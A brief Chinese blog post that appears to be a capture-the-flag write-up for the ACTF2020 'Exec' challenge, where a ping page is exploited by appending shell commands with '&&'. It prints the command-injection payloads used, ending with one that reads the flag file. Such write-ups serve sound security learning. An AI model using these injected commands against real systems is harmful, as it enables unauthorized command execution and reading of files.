[ACTF2020 新生赛]Exec 1

[ACTF2020 新生赛]Exec1

打开实例发现为一个ping页面,发现可以配合&&执行多项命令,尝试127.0.0.1&&ls无果,便遍历根目录(127.0.0.1&&cd 1&&ls)

image-20241104220757746

发现flag文件,构造payload

127.0.0.1&&cd /&&cat flag

发现flag

image-20241104220921227

posted @ 2024-11-08 18:45  TazmiDev  阅读(74)  评论(0)    收藏  举报